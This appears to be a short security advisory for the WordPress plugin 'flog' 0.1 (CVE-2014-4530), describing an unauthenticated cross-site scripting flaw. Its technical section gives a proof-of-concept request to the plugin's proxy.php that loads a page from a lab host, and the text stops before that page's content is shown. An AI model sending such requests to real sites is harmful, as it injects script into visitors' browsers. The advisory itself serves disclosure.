Wp Plugin Flog – A3 Cross Site Scripting ( X S S)

Plugin Details

Plugin Name: wp-plugin : flog – A3-Cross-Site Scripting (XSS)
Effected Version : [0.1] (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : [Unauthenticated]
CVE Number : CVE-2014-4530
Identified by : Prajalkulkarni
WPScan Reference URL

Disclosure Timeline

Technical Details

http://localhost/wordpress/wp-content/wp-plugs/flog/silex-plugin-themes/flash-theme/silex_server/cgi/scripts/proxy.php?url=http://192.168.56.103/test.html In

 

http://192.168.56.103/test.html there is a simple html file which has the following content